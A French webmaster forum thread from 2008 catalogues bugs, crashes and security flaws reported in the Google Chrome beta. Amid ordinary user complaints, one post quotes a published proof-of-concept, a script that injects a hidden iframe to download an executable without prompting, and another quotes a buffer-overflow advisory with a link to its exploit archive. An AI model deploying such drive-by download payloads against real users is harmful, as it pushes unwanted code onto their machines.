Liste des bugs, erreurs et failles Google Chrome beta

Discussion dans 'Google : l'entreprise, les sites web, les services' créé par carole heinz, 2 Septembre 2008.

  1. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    Suite à la sortie du navigateur Google Chrome version beta , il pourrait être intéressant de lister ici les différents bugs et failles que chacun rencontre (ou pense rencontrer) avec ce tout nouveau navigateur.

    déjà repérés (mais pas tous avérés, attention ) :



    Vie privée


    - installation d'un supercookie (tracker) insensible à la suppression traditionnelle des cookies [procédure de suppression] (à réitérer après chaque mise à jour)


    Failles (sécurité)


    - exploit 8 Remote Silent Crash PoC
    - exploit 7 Save As remote BOF exploit
    - exploit 6 a href denial of service (DOS)
    - exploit 5 Inspect Element DOS exploit
    - exploit 4 Carriage Return Null Object Memory Exhaustion Remote Dos
    - exploit 3 Window Object Suppressing Remote Denial of Service
    - exploit milw0rm 2: l'enregistrement d'une page contenant une balise <title> trop longue rend possible l'exécution de code malicieux
    - exploit milw0rm 1: download d'executables (.exe) sans autorisation
    - il est possible de charger n'importe quelle DLL dans le process de Chrome avec un simple shellexecute.



    Bugs (affichage, fonctionnalités...)

    - tapez "about:%" dans la barre adresse/recherche -> plantage
    - crash de l'onglet affichant un pdf (quand on scrolle verticalement dans le pdf)
    - crash complet sur lien formé d'un identifieur inconnu suivi d'un caractère spécial
    - connexion impossible Microsoft AdCenter
    - calcul d'itinéraire ViaMichelin HS
    - pb affichage Facebook (lien "commenter")
    - pb affichage GMail (écrasement de certaines colonnes)
    - ne lit pas les applications Microsoft Silverlight
    - pas d'icône orange RSS dans la barre d'adresse/recherche
    - le crash d'un onglet cause quand même le blocage des autres onglets dans certains cas
    - bugs avec certains scripts javascripts
    - pas de reconnaissance JAVA
    - des problèmes de scroll avec molette souris / touchpad
    - gestion du multi-screen problématique (scroll)
    - problème d'affichage de la liste des mots de passe
    - pas d'affichage du PR lol
    - trojan repéré par certains AV lors de l'installation
    - impossibilité de mettre un site 2 fois en favoris (dans des dossiers différents)
    - correcteur orthographique parfois fantaisiste
    - certains caractères deviennent invisibles lors de la saisie
    - blocage de sites utilisant la régie cibleclick
    - gestion de certains paniers ecommerce (impossible d'ajouter au panier)
    - gestion des width/height en %
    - certaines checkboxes
    - affichage des flux RSS
    - gestion des position: absolute
     
  2. moktoipas
    moktoipas WRInaute passionné
    Inscrit:
    29 Juin 2004
    Messages:
    1 522
    J'aime reçus:
    0
    "blocage de sites utilisant la régie cibleclick"

    est-ce un bug :twisted: :twisted:

    pour ma part, j'en ai pas trouvé du bugs ><
    et mes checkboxes n'ont rien de spécial
     
  3. mythos75
    mythos75 Nouveau WRInaute
    Inscrit:
    20 Mars 2005
    Messages:
    24
    J'aime reçus:
    0
    Correcteur orthographique toujours fantaisiste :)
    La saisie de texte est vraiment pénible...
     
  4. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 149
    J'aime reçus:
    270
    Certains antivirus avertissent lors de l'installation qu'il y a un trojan (vu sur les autres posts et sur les blogs).
     
  5. mythos75
    mythos75 Nouveau WRInaute
    Inscrit:
    20 Mars 2005
    Messages:
    24
    J'aime reçus:
    0
    Dans les options, la liste des mots de passe : je ne peux pas faire "afficher le mot de passe". Peut-être parce que normalement j'ai un mdp général qui protège mes mdps ? Dans firefox je dois saisir ce dernier pour voir la liste de mes mdps enregistrés.
     
  6. 5_legs
    5_legs WRInaute passionné
    Inscrit:
    30 Avril 2006
    Messages:
    1 551
    J'aime reçus:
    0
    ça ne semble pas être un bug, chez moi ça fonctionne, la différence c'est l'affichage du mot de passe à l'unité (contre la totalité pour FF)
     
  7. moktoipas
    moktoipas WRInaute passionné
    Inscrit:
    29 Juin 2004
    Messages:
    1 522
    J'aime reçus:
    0
  8. mythos75
    mythos75 Nouveau WRInaute
    Inscrit:
    20 Mars 2005
    Messages:
    24
    J'aime reçus:
    0
    Moi ça n'affiche rien du tout :) Le txt du bouton change mais rien n'apparaît, je suppose que normalement une nouvelle colonne est créée, pas chez moi.
     
  9. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    merci pour ces infos (je mets la liste à jour sur le premier message)
     
  10. Al-Kanz
    Al-Kanz WRInaute discret
    Inscrit:
    15 Août 2007
    Messages:
    211
    J'aime reçus:
    0
    hier soir, impossible de faire apparaître le calendrier sous Google Analytics.
     
  11. L.Jee
    L.Jee WRInaute accro
    Inscrit:
    11 Décembre 2007
    Messages:
    5 429
    J'aime reçus:
    0
    Analytics à eu quelques soucis chez moi aussi mais même sur firefox.
     
  12. TheKind
    TheKind Nouveau WRInaute
    Inscrit:
    1 Décembre 2007
    Messages:
    2
    J'aime reçus:
    0
    Je confirme ce bug. Je suis sur un Dell 1520, Vista Edition Familiale Basique, le scroll vers le bas avec le touchpad marche impécablement, vers le haut ça bouge pas.
    Par contre si je branche une souris, ça scrolle...
     
  13. easydoor
    easydoor WRInaute discret
    Inscrit:
    9 Mars 2006
    Messages:
    120
    J'aime reçus:
    0
    pour la liste des bugs

    Impossible d'ouvrir le lien " Commenter" dans facebook (125 millions d'abonnés)

    l'affichage écran dérape certaines fois, cad il découpe et glisse des lignes vers la droite, le haut des mots n'est plus aligné avec le bas.

    bizarre chez google un produit aussi mal fini. respecte t-il les protocoles

    le dictionnaire signale une faute dans Google et google

    je crois que je vais pas me prendre la tête avec chrome, j'y reviendrai plus tard .
     
  14. moktoipas
    moktoipas WRInaute passionné
    Inscrit:
    29 Juin 2004
    Messages:
    1 522
    J'aime reçus:
    0
    easydoor >> C'est une BETA
     
  15. easydoor
    easydoor WRInaute discret
    Inscrit:
    9 Mars 2006
    Messages:
    120
    J'aime reçus:
    0
    difficultés d'affichage dans Gmail, il y a des colonnes qui s'écrasent entre elles.

    pour moi je ne lis pas le nombre en fin de ligne boite de réception .

    c'est une béta, c'est un béta.

    pardon, mais entre béta et qualité de travail, google nous a montré dés béta mieux que cela avec des testeurs ou des invitations.

    gros coup de pub, pour moi gros flop ou bonne stratégie pour exciter leurs concurrents et les pousser à évoluer .
     
  16. moktoipas
    moktoipas WRInaute passionné
    Inscrit:
    29 Juin 2004
    Messages:
    1 522
    J'aime reçus:
    0
    non mais je veux dire, c'est une VRAI beta, pas comme les autre beta de google (comme celle de gmail).
     
  17. metropoway
    metropoway WRInaute discret
    Inscrit:
    3 Mars 2004
    Messages:
    223
    J'aime reçus:
    1
    Entièrement d'accord.
    C'est effectivement assez surprenant cette sortie pour le moins minimaliste à tout point de vue. Surtout peu de temps après la sortie en fanfare de la v.3 de FF.
    Cela se rapproche plus d'une version alpha que d'une version beta.

    On peut se poser la question effectivement.
    Je pense qu'on ne tardera pas à le savoir.
     
  18. moktoipas
    moktoipas WRInaute passionné
    Inscrit:
    29 Juin 2004
    Messages:
    1 522
    J'aime reçus:
    0
    en ingenierie logiciel:
    version alpha=toute les fonctions ne sont pas la et celle qui sont la ont des bugs.
    version beta=toutes les fonctions sont la et ont des bugs.

    cette sortie est tout sauf minimaliste...toute la technosphere ne parle que de ca depuis lundi !
     
  19. metropoway
    metropoway WRInaute discret
    Inscrit:
    3 Mars 2004
    Messages:
    223
    J'aime reçus:
    1
    Je ne savais pas que le niveau de 'bruit' fait autour de quelque chose était gage de qualité.
    En tout ca, ça veut dire qu'il y a au moins une chose non minimaliste dans cette sortie : la comm :wink:

    C'est bien ce que je dis.
    Que cela ne soit plus une alpha... peut-être ?
    Mais j'ai du mal à imaginer qu'il puisse s'agir d'une vrai beta.
     
  20. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    oui ça c'est juste parce les bloggeurs et autres geeks ne prennent pas conscience qu'ils font un travail gigantesque de com', et gratuitement en +

    google lance un powerpoint avec un sosie d'Elton John au micro et le monde entier le relaye: plus fort que les travailleurs pauvres, les travailleurs bénévoles de Google. tout ça pour récupérer quelques clics à $0.02

    la course au scoop et à l'audience corrompent complètement l'esprit critique de certains. résultat tout le monde est manipulé: on creuse notre propre tombe, et avec le sourire, en plus.
     
  21. easydoor
    easydoor WRInaute discret
    Inscrit:
    9 Mars 2006
    Messages:
    120
    J'aime reçus:
    0
    j'aime bien vos réflexions carole et metropoway

    par contre maintenant je suis passé en mode travail et chiffre d'affaire
     
  22. moktoipas
    moktoipas WRInaute passionné
    Inscrit:
    29 Juin 2004
    Messages:
    1 522
    J'aime reçus:
    0
    C'est le premier produit que je vois pour lequel google a fait un visioconference.

    Sinon c'est toujours plus une "vraie" beta qu'ie8 b1 ou safari pour win b1...:D
     
  23. Sullyvan
    Sullyvan WRInaute discret
    Inscrit:
    20 Mai 2008
    Messages:
    85
    J'aime reçus:
    0
    bonjour,

    j'ai un peu testé Chrome et deux bugs ont fait surface:

    1- impossible de lancer une page de navigation privée, ça ouvre la page avec l'icône 'incognito' et elle se ferme aussi tôt

    2- c'est pas un bug mais un manque ou juste moi qui ai mal cherché, il n'y a pas de gestion de la mise en page des impressions, ni même d'aperçu avant impression


    Sinon ma première impression est plutôt bonne, il est rapide (au lancement surement), le rendu des sites est bon, il semble plus léger que ses concurrents. reste à voir avec le temps..


    Edit: après un plantage lors de la duplication d'un onglet, et un re-lancage de Chrome,le mode incognito fonctionne bien..
     
  24. passion
    passion WRInaute accro
    Inscrit:
    6 Janvier 2006
    Messages:
    3 498
    J'aime reçus:
    78
    Bug de session... impossible de passer les arguments en session
     
  25. Sullyvan
    Sullyvan WRInaute discret
    Inscrit:
    20 Mai 2008
    Messages:
    85
    J'aime reçus:
    0
    c'est à dire ?
     
  26. NoGlob
    NoGlob WRInaute discret
    Inscrit:
    17 Septembre 2007
    Messages:
    146
    J'aime reçus:
    0
    +1000 !

    Le monopole de Microsoft est frainé par l'opinion publique c'est une bonne chose, par contre celle de Google est accélérer de façon très efficace par cette même opinion publique. C'est très dangereux surtout que Google concurrence (écrase) les sites Web en sortant des machines de guerre dans chaque marché à fort potentiel.
     
  27. plopz0r
    plopz0r Nouveau WRInaute
    Inscrit:
    21 Avril 2007
    Messages:
    12
    J'aime reçus:
    0
    Impossible de se connecter à la régie de liens sponsorisés Microsoft Adcenter... Pur hasard ? :roll:
     
  28. YO64
    YO64 Nouveau WRInaute
    Inscrit:
    4 Novembre 2006
    Messages:
    4
    J'aime reçus:
    0
    Je ne sais pas si il s'agit d'un bug mais je ne peux afficher aucune pasge web avec Chrome.
    Il y a un message "aie aie aie, etc.." et il me demande de rafraichir ou de changer de page.Acune solution ne marche.Je suis le seul??
     
  29. WebRankInfo
    WebRankInfo Admin
    Membre du personnel
    Inscrit:
    19 Avril 2002
    Messages:
    18 804
    J'aime reçus:
    259
  30. Thierry Bugs
    Thierry Bugs WRInaute accro
    Inscrit:
    16 Juin 2004
    Messages:
    3 397
    J'aime reçus:
    1
    en même temps c'était inévitable :wink:

    Mais peut etre que c'est sur le sujet de la sécurité
    que la guerre des navigateurs va se jouer à l'avenir
    et Chrome a des atouts certains (base google des sites dangereux, spam report, phishing...)
     
  31. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    OK je viens d'éditer le titre + le post de départ
     
  32. Jeviensderio
    Jeviensderio WRInaute passionné
    Inscrit:
    29 Septembre 2006
    Messages:
    1 062
    J'aime reçus:
    0
    Re: Liste des bugs et erreurs Google Chrome beta

    Il s'agit d'un plugin externe, Opera ne le supporte pas non plus, il faudrait que Microsoft fasse une version pour Chrome. On s'attend à ce qu'ils trainent un peu les pieds. :)

    Il faut voir Chrome avant tout comme un navigateur fait pour les applications Web (à mon avis c'est le but), sur ce plan il est parfait.
     
  33. Greendragon
    Greendragon WRInaute discret
    Inscrit:
    14 Mai 2008
    Messages:
    112
    J'aime reçus:
    0
    Chrome ne gère pas les doubles écrans : quand je le met en plein écran à droite, ça me le met avec la bonne dimension pour mon écran de gauche.
     
  34. YO64
    YO64 Nouveau WRInaute
    Inscrit:
    4 Novembre 2006
    Messages:
    4
    J'aime reçus:
    0
    Personne ne sait comment éviter ça ??

    [​IMG]
     
  35. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    un premier "exploit" qui fait crasher chrome ici (à visiter avec Chrome bien sûr! )

    -http://evilfingers.com/advisory/google_chrome_poc.php?tag=mncol;txt (je décline toute responsabilité)

    ce qui le crashe à priori c'est un simple lien formé d'un identifieur inconnu suivi d'un caractère spécial
     
  36. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    un autre bug JAVA ici:
    -http://raffon.net/research/google/chrome/carpet.html (je décline toute responsabilité)
     
  37. pillets
    pillets WRInaute discret
    Inscrit:
    13 Janvier 2006
    Messages:
    235
    J'aime reçus:
    0
    Tu n'es pas le seul moi aussi j'ai la même chose et je ne sais pas comment faire pour naviguer.

    J'ai essayé sur un autre pc et là ça marche. Donc peut etre que le problème vient, du pc mais de quoi exactement ....
     
  38. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 149
    J'aime reçus:
    270
    Vérifiez le pare-feu que vous avez s'il laisse le logiciel naviguer.
     
  39. YO64
    YO64 Nouveau WRInaute
    Inscrit:
    4 Novembre 2006
    Messages:
    4
    J'aime reçus:
    0
    Pare feu windows et pare feu de la Neuf Box désactivés, ça ne change rien. :cry:
     
  40. pillets
    pillets WRInaute discret
    Inscrit:
    13 Janvier 2006
    Messages:
    235
    J'aime reçus:
    0
    itou pare-feu desactivé et toujours la même chose.
     
  41. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 149
    J'aime reçus:
    270
    Même FAI ?
    Quel OS ?
    Peu peut-être apporter des réponses.
     
  42. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    crash d'un onglet affichant un pdf et sur lequel on scrolle verticalement. après 5 min de blocage complet, j'arrive à fermer l'onglet bloqué mais une boîte apparaît:

    Code:
    L'instruction à "0x0700609c" emploi l'adresse mémoire "0x00000014". La mémoire ne peut être "read". Cliquez sur OK pour terminer le programme.
    
     
  43. pillets
    pillets WRInaute discret
    Inscrit:
    13 Janvier 2006
    Messages:
    235
    J'aime reçus:
    0
    Non suis chez free - pc windows xp qui fonctionne bien avec ie-FF et opera depuis longtemps.
     
  44. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 149
    J'aime reçus:
    270
    Avez-vous tester Safari aussi (Google utilisant en partie cette technologie) ?
     
  45. Marie-Aude
    Marie-Aude WRInaute accro
    Inscrit:
    5 Juin 2006
    Messages:
    16 372
    J'aime reçus:
    2
    Problème "inhérent" à la logique de Chrome : une page avec des scripts, dont Lightbox.
    "Avant" les vignettes des photos n'aparaissaient pas avant que les scripts soient chargés, donc on pouvait cliquer et démarrer l'appli tout de suite, avec les zolis zeffets.
    Maintenant, les vignettes sont chargées bien avant les scripts... kaka pas bô
     
  46. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 149
    J'aime reçus:
    270
    Ce problème est aussi sur FireFox et peut-être d'autres navigateurs, il suffit que le script soit un peu long au chargement (par exemple le serveur un peu lent). :(
     
  47. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    encore une petite erreur, je ne sais pas si elle a déjà été soulignée ici:

    La Belgique a été annexée à l'Allemagne :)

    clin d'oeil à l'actualité de la Belgique? Vengeance suite à la condamnation de Google en Belgique? erreur?
     
  48. RiPSO
    RiPSO WRInaute impliqué
    Inscrit:
    5 Octobre 2007
    Messages:
    967
    J'aime reçus:
    0
    quand ils auront envoyé leur satellite pour améliorer google earth ils auront peut être une carte à jour :lol:
     
  49. YO64
    YO64 Nouveau WRInaute
    Inscrit:
    4 Novembre 2006
    Messages:
    4
    J'aime reçus:
    0
    Neufbox avec windows xp sp 3.
     
  50. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    exploit milworm:

    Code:
    ***************************************************************************
     Author: nerex
     E-mail: nerex[at]live[dot]com
    
     Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
     downloaded to the user's computer without any user prompt.
    
     This proof-of-concept was created for educational purposes only.
     Use the code it at your own risk.
     The author will not be responsible for any damages.
    
     Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
    **************************************************************************
    <script>
    document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
    </script>
    
    # milw0rm.com [2008-09-03]
    http://www.milw0rm.com/exploits/6355
     
  51. mamy domdom
    mamy domdom Nouveau WRInaute
    Inscrit:
    26 Août 2008
    Messages:
    3
    J'aime reçus:
    0
    Google Chrome beta

    bonjour
    je l'ai installé hier,et rien de rien,si je fais une recherche,ça se bloque,et j'ai un message:
    aïe,aïe,aïe,google chrome s'est bloqué,relancer ok,annuler,donc je le désinstalle pour le moment car pas le temps pour des tests
    merci à vous si vous pensez que je l'ai mal installé
    mamy domdom
     
  52. WebRankInfo
    WebRankInfo Admin
    Membre du personnel
    Inscrit:
    19 Avril 2002
    Messages:
    18 804
    J'aime reçus:
    259
  53. hipopulation
    hipopulation WRInaute occasionnel
    Inscrit:
    28 Juillet 2004
    Messages:
    291
    J'aime reçus:
    0
    Je ne sais pas si ça a déjà été vu mais taper :

    Code:
    about:%
    dans la barre d'adresse.......
     
  54. Cendrillon
    Cendrillon WRInaute accro
    Inscrit:
    17 Août 2004
    Messages:
    3 654
    J'aime reçus:
    0
    Pas vraiment sympa le résultat ... :evil:
     
  55. RiPSO
    RiPSO WRInaute impliqué
    Inscrit:
    5 Octobre 2007
    Messages:
    967
    J'aime reçus:
    0
    Aïe aïe aïe! :lol:
     
  56. papyjo78
    papyjo78 Nouveau WRInaute
    Inscrit:
    4 Septembre 2008
    Messages:
    2
    J'aime reçus:
    0
    cliques droit

    pas moyen de faire un clic droit sans erreur serieuse de microsoft !
     
  57. Cendrillon
    Cendrillon WRInaute accro
    Inscrit:
    17 Août 2004
    Messages:
    3 654
    J'aime reçus:
    0
    Allons, allons ... ce n'est pas parce que c'est Microsoft (éditeur du système d'exploitation) qui remonte les erreurs et affiche les messages de plantage qu'il en est à l'origine et/ou responsable ... :lol:
     
  58. h4ni
    h4ni WRInaute occasionnel
    Inscrit:
    11 Juillet 2005
    Messages:
    429
    J'aime reçus:
    0
    une autre faille signaler sur millw0rm

    Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit
     
  59. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    en effet:

    Code:
    PoC Code is in Attach file because this file is saved in 'Unicode' type for exploit.
    
    Here is Description for this Vuln :
    ·          Type of Issue : Buffer Overflow. 
    ·          Affected Software : Google Chrome 0.2.149.27.      
    ·          Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
    ·          Impact: Remote code execution.
    ·          Rating : Critical .
    ·          Description :
    The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving 
    a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes 
    it possible for attackers to execute arbitrary code on users’ systems.
    ·          How an attacker could exploit the issue :
    To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. 
    He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would 
    be executed, giving him the privilege to make use of the affected system.
    ·          Discoverer : Le Duc Anh - SVRT - Bkis
    ·          About SVRT :
    SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes 
    in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols 
    and embedded systems…
    ·          Website : security.bkis.vn
    ·          Mail : svrt[at]bkav.com.vn
    
    http://milw0rm.com/sploits/2008-chrome.tgz
    
    # milw0rm.com [2008-09-05]
    
    http://www.milw0rm.com/exploits/6367
     
  60. Scrat
    Scrat Nouveau WRInaute
    Inscrit:
    1 Juin 2006
    Messages:
    1
    J'aime reçus:
    0
    Moi je n'arrive pas à acceder à un site qui nécessite un certificat.

    J'ai importer le certificat et celui-ci n'est pas reconnu alors que le même certificat ne pose aucun soucis sous FF et IE.
    Pour infos, une personne sur un autre forum a exactement le même soucis
     
  61. Jeviensderio
    Jeviensderio WRInaute passionné
    Inscrit:
    29 Septembre 2006
    Messages:
    1 062
    J'aime reçus:
    0
    Un petit correctif, Chrome exécute bien les applications Silverlight (on peut le vérifier sur le tutoriel Silverlight).

    Le nom du plugin est WPF/E, l'ancien nom de code.

    Mais on peut ajouter aux défauts le fait qu'il n'affiche pas un fichier local d'extension .php (pas de problème sur un site web).
     
  62. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 149
    J'aime reçus:
    270
  63. david96
    david96 WRInaute passionné
    Inscrit:
    28 Août 2005
    Messages:
    1 205
    J'aime reçus:
    0
    Détail et source de l'article : technaute.cyberpresse.ca
     
  64. Cendrillon
    Cendrillon WRInaute accro
    Inscrit:
    17 Août 2004
    Messages:
    3 654
    J'aime reçus:
    0
    Je ne sais pas si c'est vraiment un bug, mais en tout cas c'est à mon avis ennuyeux : lorsque l'on click sur un lien du type : <a href="#" OnClick="fonction javascript"> (par exemple)... le titre de la page est remplacé par "sans titre" ...
     
  65. carole heinz
    carole heinz WRInaute passionné
    Inscrit:
    28 Février 2007
    Messages:
    2 456
    J'aime reçus:
    0
    mise à jour du post n°1 pour:

    - installation d'un supercookie (tracker) insensible à la suppression traditionnelle des cookies [procédure de suppression] (à réitérer après chaque mise à jour)
     
  66. hysteria
    hysteria Nouveau WRInaute
    Inscrit:
    29 Avril 2009
    Messages:
    1
    J'aime reçus:
    0
    Bonjour/bonsoir !

    Que j'explique mon soucis. Google Chrome à toujours été mon navigateur par défaut depuis qu'il est sorti. Je l'ai utilisé sous XP et Vista. Dernièrement j'ai du formater mon pc, changer des pièces fin bref. Je suis repartie à zéro. Seulement depuis google Chrome ne réagit plus de la même manière. Lorsque je suis sur msn et que l'un de mes contactes m'envois un lien, celui-ci ne s'ouvre pas. Chrome est mon navigateur par défaut. Lorsque c'est une vidéo/chanson je l'entend, j'ai beau cliqué rien ne s'ouvre, seulement les bruits continuent. Et merci lorsque ceux-ci sont en boucle pour les oreilles... J'ai tenté de desinstaller/ reinstaller, idem. J'ai changé de navigateur par défaut et là les liens s'ouvrent. C'est génant car chrome est le navigateur que je préfère et je ne comprend pas d'ou vient ce bug.

    J'espère que vous avez une solution. Merci d'avance.
     
  67. fluo
    fluo Nouveau WRInaute
    Inscrit:
    11 Janvier 2008
    Messages:
    12
    J'aime reçus:
    0
    Bonjour,

    J'ai un problème très gênant sur Chrome.

    Certaines pages de mon site sont rafraichies en navigation mais pas dans les sources ni dans les liens.

    Je m'explique :

    - J'ai 2 pages qui se ressemblent (beaucoup)
    - Elles contiennent des formes multiples, des liens get et post.
    - Je fais des manips diverses (cliques, retours) multiples.
    - Je suis sur la page A.
    - Je fais "Afficher le source", la page B s'affiche !
    - Je clique sur un lien, tout explose (perte des variables post)

    Si qq a une idée !!!
     
  68. manuer
    manuer Nouveau WRInaute
    Inscrit:
    4 Décembre 2004
    Messages:
    5
    J'aime reçus:
    0
    Bonsoir,

    sur l'un de mes sites, le menu déroulant (javascript) à gauche ne fonctionne pas ni les sous-menus et surtout ne s'affiche pas du tout (plus que gênant pour les visiteurs) alors que sous google ou mozilla firefox ou IE8, tout va bien

    Dois-je revoir tout le process menu et le changer ou pouvez-vous m'aider ? Merci de me répondre car il faut que je réagisse très vite

    Cordialement, Emmanuel :oops:
     
Chargement...
Similar Threads - Liste bugs erreurs Forum Date
[Liste bugs] Google Lively Beta Google : l'entreprise, les sites web, les services 9 Septembre 2008
Liste des 10 meilleurs tips pour faire fuir vos visiteurs et augmenter les profits de vos concurrent Le café de WebRankInfo 19 Juillet 2019
Le meilleur ou les meilleurs sites d'annuaires généralistes Débuter en référencement 29 Mars 2019
Un outil pour lister tous les liens d'un site Netlinking, backlinks, liens et redirections 24 Janvier 2019
Analyse google search console : liste des problèmes d'indexation Crawl et indexation Google, sitemaps 13 Janvier 2019
cherche liste sites ou forum sans moderation pour BL Netlinking, backlinks, liens et redirections 9 Juin 2018
Liste de sites acceptant des infographies en français Netlinking, backlinks, liens et redirections 6 Mars 2018
Process pour échanger une liste d'emails entre client et prestataire Droit du web (juridique, fiscalité...) 2 Janvier 2018
Veille sur Twitter : liste des tweets les plus retweetés dans la semaine Twitter 13 Novembre 2017
Liste de forum utile pour référencer un site de santé Netlinking, backlinks, liens et redirections 9 Novembre 2017
  1. Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies.
    Rejeter la notice